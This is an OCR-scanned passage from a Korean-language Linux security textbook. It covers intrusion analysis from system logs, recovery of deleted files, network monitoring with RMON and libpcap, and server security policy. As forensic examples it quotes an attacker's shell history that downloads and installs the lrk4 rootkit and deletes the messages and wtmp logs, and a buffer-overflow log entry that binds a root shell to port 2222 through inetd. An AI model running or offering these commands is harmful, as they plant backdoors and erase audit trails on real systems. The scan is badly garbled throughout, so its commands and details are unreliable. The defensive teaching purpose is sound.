가 로출되였을 가능성이 있기때문에 통과암호의 교체작업도 필요하다. 

wtmp 에 서 와 마찬가지 로 xferlog 에 서 도 접 속시 간과 원격 체 계 와의 적 합성 그리 고 가입 
등록사용자 등을 살펴 보아야 한다. 그리 고 x f er l 0 g 에서 는 송수신한 파일 이 해 킹 도구인가 기 
본자료인 가를 분석해보아야 한다. 

acct , pact 

지금까지의 기록파일들은 누가 언제 어디에서 어느 계정으로 체계에 접근했는가에 대 
한 정보들을 보여 주었다. 하지만 해킹피해체계의 피해정도와 뒤 문설치의 여부 등을 알기 위 
해서는 체계에 불법침입한 공격자가 도대체 어떤 행동을 했는가를 아는것 이 반드시 필요 
하다. 이리한 기록이 바로 체계의 사용빈도 즉 프로쎄스계수값이며 이것은 acct 또는 pacct 
파일에 기록된다. acct 및 pacct 파일은 사용자가 직접 읽을수 없는 2진코드형태로 사용 
자가 수행한 명 령의 정 보를 기록하고있다. 이 내 용은 acct 또는 pacct 파일의 내용을 사 
용자가 읽기가능한 형래로 출력 하는 laskx)mm 이나 acctcom 명령에 의 하여 확인가능하다. 
그러나 acct/pacct 파일은 사용자별로 사용한 명령을 구분하는데 유용하게 사용될수 있지 
만 사용된 명령의 파라메터와 그 명령이 실행된 등록부를 기록하지 않기때문에 공격자들 
의 행위를 추적 하기에는 부족점 이 많다. 

acct/pacct 는 또한 기 본적 으로 설정 되 여 있지 않은 상태 이 며 관리 자가 회 계 ( accounting ) 
를 하도록 설정 하여 야 한다. 설정 방법 은 system V 계 렬과 BSD 계 렬 이 약간 다르다. 

history 파일 

LINUX 체계에서 제공하는 프로쎄스회계 ( accounting ) 는 공격자의 행위를 알。!■내기에 
는 부족점이 대단히 많다. acct/pacct 이외에 공격자가 한 행위에 대하여 알수 있는 방법 
은 history 파일 을 주시 하는것 이 다. history 파일 은 매 사용자별 로 수행 한 명 령 을 기 륵하는 파 
일로서 csh , tcsh , ksh , bash 등 사용자들이 사용하는 쉴에 따라 history , bash_history 파 
일에 기록된다. 해 킹피해체계분석시 불법 사용자계정 이나 root 계정의 history 파일을 분석 
함으로써 공격자가 체계에 접근한 후 수행한 명령들을 확인할수 있다. 물론 앞에서 
acct/pacct 파일에서 기록하지 못하였던 명 령의 파라메 터 나 등록부의 위 치까지 기록이 가 
능하므로 공격 자의 행위를 추적하는데 대 단히 유용한 정 보가 될수 있다. 

아래에 해킹피해를 받은 체계에 기록된 history 파일의 실례를 보여준다. 
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# more /root/. t3s^_hfsto/y 
mkdif . w M 
cd " 

ncftp ftp. teh cnotraiic, com 

gunzip ^.gz 

tar -xvf *.t3f 

cd irk4 

make M 

cd^ 

rm -Hf kk4 

ncftp fip. technotronic, com 
gunzjp ^.gz 
taf -xvf 中 . taf 
is 

rm irkd.src. tsr 
taf -xvf ' taf 
cd trk4 
make insinll 
cd .. 
cd .. 



pho/dev/ptyr 
mkdk /usf/sbin/mistake. dir 
rm /vBf/tog/messBgBS 
rm /var/iog/wtmp 
touch ABf/log/wtmp 
pico /etc/passwd 
reboot 
exit 


우에서 보는것처 럼 공격 자가 숨은 등록부를 생성 하고 rootkit ( lrk 4) 을 내 리적재 받아 첫 
번째 설치 실패후 2번째 설치에 성공하였으며 기록파일들을 지운 후 체계를 재기동한것 
을 볼수 있다. 

history 파일은 보동 매 사용자의 홈등록부에 생성 되 는데 정 상적 인 가입등록절 차를 거 
치 지 않고 뒤문포구로 접 속하여 쉘 을 부여받았을 경 우에 는 다르다. 

즉 9704번포구에 root shell 을 련결하고 이 포구로 접속을 하게 되면 root 의 홈등록 
부 ( LINUX 체계의 경우 / root 八에 . bash _ history 파일이 생성되는것이 아니라 파일 


錢變邊 錢變變©繼鹽 






Lirnix 당보안 


리 등록부에 history 파일 이 생성 된다. 즉 /. bash_history 파일 에 뒤 문포구로 접 속하여 사용 
한 명 령들이 기록된다. 

9704포구로 접속하였을 경우 /. bash_history 에 다음과 같은 기록이 남았다. 

# more Abash hi story 
id 

mkdk /devA., 
cd / d ^ v /^. 

pwd 

touch saa 
fm -rf /tmp/xxx 

pacct 나 acct 의 기록과는 달리 이 history 파일의 내용은 공격자의 행위를 쉽게 알수 있 
게 한다. 

LINUX 체계에서 /. bash_history 파일이 존재한다면 해킹을 의심해보아야 한다. 일반적 
으로 LINUX 체 계 에서 사용자 홈등록부를 “/” 로 사용하지 않는다는것을 명 심하여 야 한다. 

messages 

말단의 화면에 출력되는 통보들은 messages 기록파일에 저장된다. messages 기록파일 
은 대 단히 방대한 정보를 포함하고있다. 체 계관리 자는 체계의 장애원인을 찾아내 기 위해 
서도 messages 파일을 검사한다. 이 파일에는 파일체계넘침，장치실패，체계설정오유 등 
의 다양한 내용을 가지고있다. 

체 계 의 장애 원 인을 찾기 위 한것 이 외 에 보안측면 에 서 도 messages 파일 은 상당히 중요 
한 역할을 하고있는데 messages 파일에 어떤 취약점으로 인해 공격을 받았는가에 대한 흔 
적을 남기고있기때문이다. 

messages 파일은 다음의 내용을 포함하고있다. 

^ timestamp 
u 호스트이름 
u 프로그람이름 
ᄄ 통보내용 

아래 의 공격 흔적 은 LINUX 체 계 의 amd 완충기 자리 넘 침 공격 이 기 록된것 이 다. 

messages . VMar 11 05^20^50 xxx 27>Mar 11 OS: 20:50 amd [468 j ： amp re Quested mount of && 錄麥錄錄錄錄麥錄 
&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&& 
&麥 && 麥麥 &&&& 麥 &&& 麥麥&索錄錄麥麥麥錄麥麥혔 &&& 資 && 麥錄麥 &&&&& 麥麥麥麥&索錄麥 &&& 麥 
&&&&&&&菜&&&&&&&&&資&&&&&&務麥&&&&&&&&&&&&&&&麥& 

IS Jan 1 多 98 —一있 f/bh/ 표 h (— c)/bif}/echo 2222 ? 

stream tcp nowait root /hin/sh ^W 
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그 결과로 기 록에 남은 공격시 간과 일치하는 시각에 root 소유의 파일 이 생성되 고 역 
시 2222포구에 root shell 이 접속되 였다. 


f/tmpj# Is 一 / 

-nv-fw~fw- / f 公公日 t fQ 公 t 1t6Maf 11 05：20 h 
[Amp]# more h 

2222 stream tcp nownit root /bin/sh sh _/ 

2222 stream tcp no^/t root /hin/sh sh -/ 

하지만 이처럼 messages 기록파일에 공격 기록이 남았다고 해서 모두 공격에 성공하였 
다는것 은 아니 다. 실패 한 공격 도 기 록파일 에 남을수 있으며 반대 로 공격 에 성 공하더 라도 기 
륵되 지 않을수도 있 다. 하지 만 대 부분의 망데 몬과 응용프로그람은 완충기 자리 넘 침 공격 에 의 
한 비정상적 인 파라메 터의 입 력을 syslog 데몬을 통하여 messages 기록파일에 기록하므로 해 
킹 당한 취 약점 분석 에 대 단히 유용한 정 보를 제 공한다. messages 기 륵파일 분석 을 통하여 공 
격 에 리 용된 취 약점 을 분석할수 있을뿐아니 라 보안과 관련된 또 다른 정 보들을 얻 을수 있 
다. 가령 해 킹 을 당한 후 많은 공격 자들은 체 계 에 sniffer ^- 설 치 하여 망을 감시 한다. sniffer 
가 실 행 되 게 되 면 망대 면 카드는 Promiscuous 방식 으로 설 정 되 게 되 는데 ifconfig 명 령 을 리 
용하여 현재의 망대면카드의 상태를 확인할수 있다. 하지만 messages 기록파일에는 현재 
의 망대 면카드의 상태 뿐만아니 라 망대 면카드가 언제 부터 언제 까지 Promiscuous 상래 였는 
가에 대 한 정 보를 가지 고있 기 때 문에 공격 자의 행 위추적 에 더 상세한 자료를 제 공한다. 


messageSrApr 24 (W3，:22 insecure keme!: device ethO entered promiscuous mode 
messages：Apr 24 06:33:07 insecure kernel device ethO/eft promiscuous mode 


우의 기록자료는 이 체계가 4월 24일 새벽 1시 55분에 Promiscuous 방식으로 설정되 
여 (sni 伴 er 가 실행되여) 6시 33분에 해제된것을 보여준다. 

messages 파일 에는 su 실패 에 대 한 기 록，특정 한 데 몬이 죽은 기 록，체 계 기동시 에 발 
생된 오유 등 다양한 기록들을 남기고있다. 

기 록량이 많기 때 문에 grep 명 령 을 리용하여 특정한 문자가 들어간 기 록만을 추출할수 
있다. 즉 “ ttdbserver ” ， “ sadmind ” ， “ cmsd ” ， “ pop ” ， “ statd ” ， “ mount ” 등 
공격 에 사용되 는 취 약점 이 들어 간 기 륵을 grep 명 령 으로 추출하거 나， “ failed ” ， “ failure ” ， 
“ denied ” ， “ promiscuous ” ， 등의 단어 가 포함된 기 록들도 주시 할 필요가 있 다. 

access _ log , error_log 

웨브봉사기에서도 어느 싸이트에서 체계에 접속하였으며 어느 파일이 내리 적재되였는 
가에 대 한 기록이 accessjog 파일에 기록되고 존재 하지 않는 파일에 대 한 접근 등의 오유 
에 대 해 서 는 error_log 에 기 륵된 다 . 

웨 브봉사기 에 대 한 공격 은 주로 CGI 프로그람에 집 중되 여있는데 취 약한 CGI 》 고， 
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에 대 한 공격 관련 기 로자료도 이 기록파일에 기록된다. 

이상의 내용을 종합하면 LINUX 체계에서는 핵심부와 각종 응용프로그람 들에서 많은 
종류의 기록을 남기고있다. 체계관리자는 이러한 기록파일들을 면밀히 분석함으로써 공격 
자가 남기 고 간 다양한 침 입 흔적 을 찾아낼수 있 다. 이 정 보는 공격 자를 추적하는데 사용 
될수도 있으며 앞으로 체계의 보안을 강화하는데 도움이 될수도 있다. 

앞에서 설명 한 기 록파일들은 독립 적 으로 분석 하는것 이 아니 라 서 로 유기 적 인 관계 를 가 
지고 추리하면서 분석하여 야 보다 효과적 일수 있다. 하나의 기록파일에 침입흔적 이 발견 
되 면 다른 기 록파일들에 서 해 당 IP 나 해 당 사용자와 관련된 기 록을 분석하여 야 한다. 또 
한 기 록파일뿐만아니 라 ps , netstat , find 등의 LINUX 명 령들을 리 용하여 체계의 상태 나 
특정 파일 들을 검 사하고 / etc / passwd , / etc / inetd . cont , / etc / rc * 등의 주요체 계 파일 들도 
침입자추적에 필요한 검사항목들 이다. 

4.2.7. 지워진 파일의 복구 

대부분의 공격 자들은 자신이 침 입 한 흔적을 삭제 한다. 기록파일자체를 삭제 하거 나 기 
륵파일 내용중에서 자신이 공격 했던 흔적 만을 삭제 하는 경우가 있으며 공격 에 사용했던 공 
격각본，프로그람，자료파일 등을 삭제하게 된다. 이러한 삭제된 파일에 대한 정보를 알 
수 있다면 피 해 체 계 를 분석 하는데 매 우 중요한 자료가 될것 이다. 

일반적으로 LINUX 체계에서 파일이 삭제되면 파일체계의 특성으로 인하여 파일의 복 
구가 불가능하다고 알려져있으나 사실 많은 경우 복구가 가능하다. LINUX 에서 M rm M 등 
의 명령으로 파일을 삭제하게 되면 파일과 관련된 모든 정보가 없어지는것이 아니라 몇가 
지 정보만 파괴되거나 단순히 〈〈사용되지 않음》으로 표시되여 사용할수 없게 된다. 이때 
파일 체 계 에 대 한 쓰기조작이 일 어 나면 이 사용되 지 않는 부분을 다시 사용하게 되 고 원래 
있 던 정 보가 사라지 게 된 다. 하지 만 이 러 한 삭제 된 파일 에 대 한 정 보는 비 륵 파일 체 계 의 쓰 
기조작이 다시 일어나도 비교적 오랜기간 유지된다. 

LINUX 에서 파일크기가 큰 경우에는 디스크의 여 러 곳에 분할되여 저장되는데 이것 
은 지 원진 파일 을 복구하기 힘 들게 한다. 하지 만 최 근 개 발되 는 체 계 들에 서 는 파일체 계 
’’ locality ’’ 능력 (하나의 파일을 가능한 가까운 위치에 저장하는 기능) 이 강하기 때문에 파 
일분할이 많이 일어 나지 않고 따라서 지워진 파일을 복구하기 가 쉽다. 특히 LINUX 체계 
의 경 우 파일 을 삭제하여 도 12개 까지 의 파일 자료블로크정 보를 유지 하기 때 문에 파일 복구 
가 매우 쉽다. 

하지만 파일이 삭제된 다음 다른 많은 파일체계의 사용이 있는 경우에는 다른 내용으 
로 뒤덮여 쓰일수가 있다. 또한 공격자가 이 러한 복구방법에 대처하여 안전하게 파일을 깨 
끗이 지울 경우에는 복구할수 없게 된다. 

LINUX 체계에서 지워진 파일을 복구할수 있도륵 지원해주는 공개도구가 있다. 이리 
한 도구를 사용하여 앞에서 설명한 보존되는 정보를 가지고 어느 정도 삭제된 파일을 복 
구할 ^I 다. 주의 할 점 은 이 리 한 도구를 사용할 때 복구하려 는 파일 이 위 치 한 구획 에 서 작 
/1\€면 해당 파일내용을 덮어쓰기때문에 파일이 완전히 파괴될수 있다. 
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제3절. 망감시에 의한 통신자료흐■분석 

4.3.1. 망감시의 개념 

망자원을 안전하고 효률적으로 리용하기 위해서는 망의 상태를 측정할수 있는 도구가 
필요하고 이 도구로 측정된 자료를 분석 하여 망을 관리 한다. 망감시는 특정 한 망을 관리 
하기 위 하여 해 당 망상에서의 파케트흐름을 수집，분석 하는것을 말한다. 

1) 망분석기 

망감시 역 할을 하는 프로그람을 망분석 기 (Network Analyser ) 또는 망대 행 체 (Network 
Agent ) , 망탐지 (Network Probe ) 라고 한다. 망분석 기 는 크게 2중복제 ( mirror ) 포구에 망 
분석하드웨 어 를 련결 해 서 감시 하는 하드웨 어분석 기 와 LAN 상에 서 망분석쏘프트웨어 를 사 
용하여 감시 하는 쏘프트웨어 분석 기 가 있 다. 

분석 기는 망의 충돌회수，길 이초과파케트의 개수 그리 고 CRC 오유가 난 파케트의 개 
수 등과 같은 망의 상태정보를 대면부로부터 얻 어 내고 망에서 흐르는 파케트들을 분석하 
여 파케 트의 개 수，길 이 별 파케 트분포 그리 고 호스트의 통계 정 보 등을 수집한다. 



그림 4-1. 망감시기능 


2) LAN 의 특성 

일반적 으로 LAN 은 모든 파케 트를 방송 ( broadcast ) 하기때 문에 한 부분망안어뇨ᅨ는 목 
적지 가 자신의 주소가 아닌 다른 주소의 파케트도 읽 어들일수가 있다. 망카드의 
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을 모든 파케트를 읽도륵 “ promiscuous ” 방식으로 바꾸면 LAN 상에서 흐르는 모든 파케 
트의 내 용을 읽어 들인다. 

3) 원격 망감시 ( RMON:Remote Network Monitoring ) 

LAN 의 “ promiscuous ” 방식 에서 동작하는 대 행체는 한 부분망안의 전체 통과량과 오 
유통계，충돌회수，실행통계 등을 파악할수 있으며 사전에 입력된 관리설정에 의해 파케 
트를 려과할수도 있다. 이 렇게 기본 감시기 가 대 행체 와 동일한 망에 존재하지 않더 라도 원 
천지 에 서 망의 정 보를 얻 을수 있는것 을 원격 망감시 (Remote Network Monitoring ) 라고 한 
다. 한 토막의 망 정 보를 수집하는 대 행 체 를 RMON 람지 (RMON Probe ) 라고 부론다. 

一 RMON 의 동작원리 

RMON 을 리용한 망구성 은 아래 그림 과 같다. 



그림 4-2. RMON 를 리용한 망의 구성 


관리자는 이써네트 b 에 있지만 이써네트 A 의 망정보를 RMON 대행체를 통해 얻을수 
있다. 그리 고 RMON 대 행체는 한 부분망전체 에서 발생 하는 통과량을 파악한다. 즉 전체 발 
생 통과량，토막에 련결된 매 호스트의 통과량，호스트들간의 통과량 발생 상태 를 알려준다. 

이러한 처리를 위 하여 RMON 대행 체는 전체 통계자료，리력 ( history ) 자료，호스트관 
련자료，호스트행 렬 ( matrix ) 과 사전에 문제 예측 및 제거를 위 해서 특정 한 파케트를 려 
과 ( filtering ) 하는 기능과 림계값 ( threshhold ) 설 정 및 이에 도달하면 자동적으로 알려주는 
경 보 (^ rm ) 기 능，사건 ( event ) 발생 기 능을 가지 고있 어 야 한다. 


경 보 (ajarr 

聲 
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一 RMON MIB (Management informant Base ) 

RMON 은 망관리 를 위해 새 로 마련된 특정한 통신규약은 아니 다. RMON 은 전체 망 
관리항목을 정 해 놓은 일 종의 규약이 며 이 정 보는 MIB 으로 정 의 되 여있 다. 

RMON MIB 의 정보교환은 SNMP 를 사용한다. RMON 의 표준은 RFC2819 에 정의 
되여 있으며 관련된 RFC 는 다음과 같다. 


표 4-3. 

RMON 관련 RFC 문서 

RFC 

제목 

RFC 1271 

Remote Monitoring (obsolete) 

RFC 1513 

Token Ring Extentions to the Remote Network Monitoring MIB 

RFC 2819 

Remote Network Monitoring MIB 

RFC 2021 

Remote Network Monitoring MIB II 

RFC 2895 

RMON Protocol Identifier 

RFC 2896 

RMON Protocol Identifier Macros 

RFC 2613 

RMON Extentions for Switch Networks 


RMON MIB 에서는 RMON 이 갖추어 야 할 목표를 다음과 같이 제시하고있다. 

비직결 (Offline) 동작 

RMON 대 행 체 가 관리 자와의 통신에 영 향을 받지 않고 정 보를 수집 하기 위해서 동작 
하는 방식은 다음의 그림과 같다. 



그림 4-3. 비직결동작 
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RMON 탐지는 부분망의 정 보를 수집 하고 이것을 관리하는 주콤퓨터는 전화회 선을 통 
하여 다른 망에 있다. 그리고 이 사이의 정보교환은 필요할 때마다 전화를 리용한 PPP 
통신으로 이루어진다. 이렇게 Offline 망감시는 폴링 ( polling ) 에 의한 망부하를 줄일수 있 
고 주 콤퓨터 가 고장일 때 에도 상관없 이 망정보를 수집할수 있다. 

1 차 ( Proactive ) 감시 

감시기가 충분한 자원을 가지고있다면 감시기에 주어진 자원에 따라 인터네트 특정한 
부분에 장애 가 발생 하였을 때 망을 진단하고 해 당자료를 분석하여 장애 및 장애 에 대 한 기 
륵을 관리 자에게 보고할수 있어 야 한다. 

문제 발견 및 보고 

감시기 는 망자원의 오유나 관리 자가 정한 특정한 사건 이 발생 하였 을 경 우에 그 사건 
을 기록으로 남기고 관리 자에게 보고할수 있어 야 한다. 

부가가치자료 

감시기 는 수집한 자료에 의 미 있는 가치 를 부여할수 있 어 야 한다. 즉 고찰하는 부분망 
의 가장 많은 통과량과 오유를 발생시키는 호스트들을 집중 고찰한다. 따라서 망에 오유 
가 발생했을 때 이 문제를 해결할수 있는 세밀한 정보를 관리자에게 줄수 있다. 

여러 관리자 

보통 인터네 트관리 는 안전성 을 위해서 여 러개의 관리 자를 사용한다. 감시기 는 이 렇게 
여러 관리자가 보내는 명령을 모두 처리해야 한다. 하지만 이때 감시기의 체계용량에 따 
라서 관리자명령대로 수행못할수도 있다. 

4.3.2. 파케 트수집 서 고 (Packet Capture Library ： libpcap) 

LINUX 체 계 에서 는 망감시 의 목적 으로 libpcap 라는 전문 파케 트수집서고를 제 공한다. 
libpcap 서 고는 LAN 상의 파케 트를 체 계 와 독립 적 인 사용자준위 에 서 수집 하는 서 고로서 BSD 
기 반의 파케 트수집구조를 가지 고있다. 이것은 promiscuous 방식 으로 동작하고 이써네트， 
PPP 등 다양한 망구성 방식 에서 사용할수 있으며 개 발자용 API 함수도 제 공하기때 문에 이 
서고를 사용해서 직접 파케트의 수집 및 감시 프로그람을 개발할수도 있다. 
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리 용차 



BPF(BSD Packet Filter ) : BSD 파케 트러 과 

libpcap 서 고의 기 본구조는 BPF 로 이 루어져 있 다. BPF 는 핵 심 부준위 에 서 망자료흐름 
을 걸어채 기 ( hook ) 하여 같은 부분망상에서 흐르는 파케 트를 모두 읽어들인다. 그리 고 정 
의한 려 과형 식 에 따라서 주어 진 완충기 에 그 내 용을 저 장한다. BPF 는 주어 진 대 면부에 
서 다중프로쎄 스도 감시할수 있 다. 

- 파케트수집을 위한 핵심부 설정 

libpcap 서고를 사용해서 LINUX 체계에서 파케트를 수집하기 위해서는 핵심부가 
“ packet ” 규약을 지 원해 야 한다. 그렇 지않으면 오유가 발생한다. 

“ packet ” 규약은 LINUX 핵 심 부 2.0 이 상에서 설정할수 있 다. 규약설정 은 
“Networking option ” 메 뉴에서 설정할수 있다. 핵심부 2. 2 .x 나 2. 4. 표의 경우는 이 
“Packet Socket ” 메 뉴에 서 설정 해 주면 된 다. 

- 완전한 파케 트수집 을 위한 “Socket Filtering ” 설정 

핵 심 부 2 . 2 이 상 판본부터 는 tcpdump 같은 libpcap 파케 트서 고를 사용하는 프로그람 
들이 핵심부준위에서 파케트를 수집할수 있도륵 하는 “Socket Filtering ” 옵션을 제공한 
다. 이 옵션을 사용하면 핵 심 부에 서 수집 한 파케 트를 libcap 서 고와 같은 사용자준위 로 복 
사하는 과정 이 줄어든다. 

사용자준위 에 서 파케 트를 수집하면 내 부의 복사과정 이 여 러 번 반복된 다. 따라서 CPU 
의 부하가 많이 걸 리 기때문에 파케트를 잃어 버 리는 현상이 발생한다. 하지 만 이 삐^!' 
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용하면 파케트를 복사하는 과정 을 핵 심부준위 에서만 수행한다. 따라서 CPU 의 부하가 줄 
어들고 파케트를 잃어 버 리는 현상을 막을수 있다. Socket Filtering 의 자세 한 도움말은 핵 
심 부원천코드의 Linux / Documentation / Networking / filter , txt 파일 에 들어 있 다. 
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제 5 장. 망보안방책작성 및 보안체계수립 

제1절. 망보안방책의 작성 

5.1.1. 망보안방책의 기초 

콤퓨터보안에 대해 론의할 때 《방책》이란 용어는 여러가지 의미를 가전다. 방책이 
란 콤퓨터보안프로그람을 만들고 프로그람의 목적을 제시하며 각자의 책임을 할당하는 등 
의 상급관리자의 지시이다. 

방책이란 용어는 특정한 체계에 적용되는 구체적인 보안규칙을 의미한다. 

1) 망보안방책의 목표 

망보안방책의 목표는 를퓨터망을 통한 정보의 류출，파괴，비법적인 수정으로부터 망 
을 안전하게 보호하는것이다. 

2) 망보안방책의 필수조건 

一 봉사기 관리 를 위한 보안요구사항을 포함하여 야 한다. 

— 외 부접 속장치 들의 관리 를 위한 보안요구사항을 포함하여 야 한다. 

一 사용자관리 를 위한 보안요구사항을 포함하여 야 한다. 

一 물리 적회 선과 저 장매 체관리 를 위한 보안요구사항을 포함하여 야 한다. 

一 관련문서 들의 보관과 관리 를 위한 요구사항을 포함하여 야 한다. 

3) 망보안의 요구조건 

망보안방책 및 일련의 보안활동은 정보자원에 대하여 다음의 요구조건을 만족시켜 야 한다. 
一 완전성 (Integrity) 

一 기밀성 (Confidentiality) 

一 식별 및 인증 (Identification & Authentication) 

一 접 근조종 (Access Control) 

一 부인봉쇄 (Non-Repudiation) 

— 검 열 및 책 임 체 계 (Audibility & Accountability) 

一 믿 음성 및 리 용성 (Reliability & Availability ) 

4) 보안방책의 기본원칙 

① 보안관리 는 일 관성 과 기 밀성 을 보장하기 위해 중앙관리 의 원칙 을 따른다. 

② 모든 자원(인적 자원 및 정 보자원)은 보안등급에 따라 분류하여 관리하여 야 한다. 

③ 외부로부터 내부에 로의 접근은 제 한하는것을 원칙으로 한다. 
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④ 프로쎄스의 조종체계부분에 대해서는 별도로 보안을 강화하여야 한다. 

⑤ 사용자가 있는 모든 체계는 반드시 다음의 요소를 포함하는 기록관리를 한다. (언 
제/누가/어디로부터/내부의 어느 체계로 들어와서/무엇을 했는가.) 

⑥ 내부에서 외부에 로의 정보봉사요구는 제 한없이 허 용하되 정 보의 류출은 통제 하여 
야 한다. 

⑦ 사용자 ID ( UID ) 는 개인별로 유지하는것을 원칙으로 한다. 

⑧ 보안방책 을 유지 하기 위하여 필요한 제 도 및 절 차는 규정화하여 실 행하여 야 한다. 

5.1.2. 봉사기보안운영관리준칙 

1) 계정은 일련의 절차에 따라 생명주기를 가지며 봉사기관리자에 의해 통합관리된다. 

2) 계정 에 대 한 통과암호는 사용자계정관리지 침 에 준한다. 

3) 봉사기 안의 불필요한 망통신규약은 삭제한다. 

4) 봉사기 보안관리자는 응용프로그람 기 본계 획단계 에 서 보안방책 에 근거한 응용프로 
그람개발을 장려하고 이것을 위반할 때에는 개발을 중지시킬수 있다. 

5) 봉사기는 물리적인 보안문제를 먼저 해결한 다음 가동하는것을 원칙으로 한다. 

6) 보안검 사계 획 의 수립 후 일，주，월 단위 로 보안검 사를 진행하여 야 한다. 

7) 특권사용자의 권한은 보안관리 자 및 봉사기운영자로 제 한되며 ID 와 통과암호는 제 
한된 사용자에 의하여 관리 된 다. 

8) 보안검사목록은 반드시 다음의 내용을 포함하여야 한다. 

Cron 표，봉사데몬상태，수상한 ID ， 망봉사파일，현재 가동중인 프로쎄스，통과암호파일 

5.1.3. 사용자계정관리준칙 

사용자계정관리준칙은 채계에 가입등록할수 있도륵 허가된 모든 사용자들에 대한 관 
리규정 및 절차를 정 한다. 

1) 사용자계정분류 
一 봉사기관리자 

특권사용자로서 봉사기의 모든 권한을 가지고있으며 오직 하나만이 존재한다. 

一 체계프로그람관리 자 

체계관리자로서 권한을 가지고있으며 특권사용자의 일부 권한을 허용한다. 

一 응용프로그람관리자 

응용프로그람개 발을 위 한 사용자로서 개 발완료시 사용자등록절 차에 따라 폐 기된다. 
一 응용프로그람사용자 

응용프로그람 사용자 ID 체 계 에 따라 운영한다. 

一 일반사용자 

OfWS , FTP 등 사용자로서 인증된 봉사기 자원에만 접 근을 허 용한다. 
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2) 관리범위 

새로운 사용자계정설정에서부터 변경，페기까지 일련의 과정을 사용자등록절차에 따 
라 관리，운영한다. 

3) 관리준칙 

一 사용자별 또는 그롭별 로 접 근권한을 부여한다. 

一 사용자 ID 의 유효기 간을 설 정 한다. 

一 통과암호관련기준을 준수한다. 

— 통과암호의 리 력 정 보를 관리하여 통과암호의 재 사용을 금지한다. 

— 일정한 회 수의 가입 등록시 도가 실패하면 사용자의 리용을 금지 시 킨다. 

一 요일 및 시간별 가입등록을 제한한다. 

一 특권사용자는 특정 한 말단에 서만 가입등록가능하게 한다. 

4) 사용자등록 및 폐기절차 

一 특권사용자권한은 봉사기관리자에게 부여되고 특권사용자권한을 위임할 때는 철저 
히 보안관리절차에 따른다. 

一 사용자등록 변경 및 페 기는 사용자등록양식 에 기준하여 봉사기 관리 자가 수행 한다. 

5) 사용자계정별 권한기준 

一 특권사용자는 봉사기의 모든 자원의 접근을 허용한다. 

一 체계응용프로그람관리자는 특권사용자권한을 일부 통제하고 체계자원의 일부만 접 
근을 허용한다. 

— 응용프로그람개 발자 및 일 반사용자는 특권사용자권한을 통제 하고 체 계 자원접 근을 통 
제 한다. 

6) 통과암호설정기준 

一 사용자의 이름 또는 그 이름을 변경시키거 나 반복사용하는것을 금지한다. 

一 간단한 문자의 련속을 금지한다. 

一 배 우자，자녀，유명 한 사람의 이 름 등을 제 한한다. 

一 동물，장소，장비 이름 등을 피한다. 

— 간단한 영 어 단어 사용을 금지한다. 

— 영 문으로 하면 대 소문자를 사용하여 설정한다. 

一 특수문자，기 호를 포함한다. 

一 8자리를 모두 사용한다. 
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5.1.4. 보안관리절차 

보안관리절 차는 정 보보안관리상 필요대 상에 대해 업무처 리절차를 규정 하여 체계적 이 
고 일관된 보안방책을 실현하기 위해서이다. 

1) 대상 

一 사용자계정절차 (등록，변경，삭제) 

—보안검사절차 

一 체계사용신청절차 

一 파일 체계 사용 신청 절차 

2) 방법 

一사용자계정절차 

^ 사용자계 정 은 사용자등록신청서 를 작성한 다음 해 당 프로젝 트관리 자의 결재 를 받 
은 다음 봉사기관리 자에게 통보한다. 

ᄄ 봉사기관리자는 내용을 검토한 다음 해당 프로젝트관리자의 결재를 보고 작업을 시 
작하며 작업이 끝난 다음 결과를 통보한다. 

一 보안검사절차 

보안관리자는 보안검 사목록에 의 거하여 일，주，월 단위 로 검 사내 용을 검 열 하며 해 
당 프로젝트관리자의 결재를 보고 보안검사관리철에 기록한다. 

—체계사용신청절차 

^ 체계작업 (장해복구 및 점검)을 위하여 root 권한을 위임받았을 때에는 체계작업계 
획서 를 작성한 다음 해 당 프로젝 트관리 자의 결재 를 받은 다음 봉사기 관리 자의 립 회하에 작 
업 을 시 작한다. 

ᄄ 작업 완료후 봉사기 관리 자는 뒤 문검 사목록에 기 준하여 체 계 검 사를 한 다음 사용자 
계정절 차에 의하여 통과암호를 변경한다. 

— 파일 체 계사용 (허 가) 신청절 차 

^ 해 당 업 무담당자는 파일 및 등록부사용권한 허 가를 받기 위하여 파일 체 계사용신청 
에 관한 내 용을 상세 히 작성한 다음 해 당 프로젝 트관리 자의 결재 를 받아 봉사기 관리 자에 
게 통보한다. 

^ 봉사기관리자는 해당 프로젝트관리자의 결재를 받고 파일 및 등록부의 권한을 해 
당 사용자에 게 부여한다. 


5.1.5. 보안관리활동 

1) 사용자계정확립 

一 사용자 ID 에 대 한 유효기 간설정 

사용자 ID 별 통과암호관리 규정검 사 (최 소길 이，변경 주기，반복 글자수 등) 
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一 사용이 완료된 ID 삭제작업 (개발완료 및 퇴직자 등) 

— CONSOLE 에 대 한 LOCK 기능부여 
一 사용하지 않는 ID 의 추출 및 정 리 

— 통과암호파일 대 신에 숨겨 진 파일의 사용으로 계 정관련정 보류출방지 

2) 파일체계관리강화 

一 파일 및 등록부에 대한 코드표준화여부검사 
一 사용자 파일 및 등록부의 소유권과 권한검사 

— 파일 및 등록부의 정확한 속성을 제시하고 권한 변경여부를 검사 

— 초기기 동 파일 및 CRONTAB 파일 보안상태검 사 

3) 보안검사기록관리 

一체계접근시도 실패 기록에 대한 기록보관 및 추적 
一 root 활동범 위추적 

一 사용자 진입내 용 기 록관리 및 분석 (가입등록，가입탈퇴，파일접 근 등) 

5.1.6. 보안검사계획서 

1) 보안검사자 및 활동 

一 보안관리자가 보안검사목록에 기준하여 일，주，월 단위로 보안검사를 실시한다. 

— 보안관련보수 ( patch ) 를 주기 적 으로 실시한다. 

2) 봉사기보안검사시 주의사항 

一 특권사용자통과암호를 아는 사람이 많지 않는가? 

一 통과암호설정 이 적 당한가? 

一 shadow 파일 및 passwd 파일의 권한이 적당한가 변경사항이 없는가? (/ etc / passwd ， 
/ etc / shadow ) 

— SETUID 를 없애거 나 READ - ONLY 로 파일을 외부로 탑재 ( mount ) 했는가? 

一 보안도구를 설 치하여 실 행하는가? 

一 ‘ r ’ 계 렬 명 령 들을 금지하였는가? 

— / etc / hosts , equiv , $ HOME /. rhosts 파일을 제거 하였는가? 

一/ etc / inetd . conf , / etc / services 의 권한방식이 644이며 소유자가 root 인가? 

一 UUCP 계 정 을 제 거 하였 는가? 

— 봉사데 몬들 ( ftpd，fingerd 등) 이 최 신 판본 인 가? 

3) 봉사기보안검사목록 
一 사용자 

^ 체계의 물리적보안을 유지하는가? 
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1 보 가입등록과 접근조종을 유지하는가? 

^ 통과암호는 구성규칙 에 맞게 설정하였는가? 

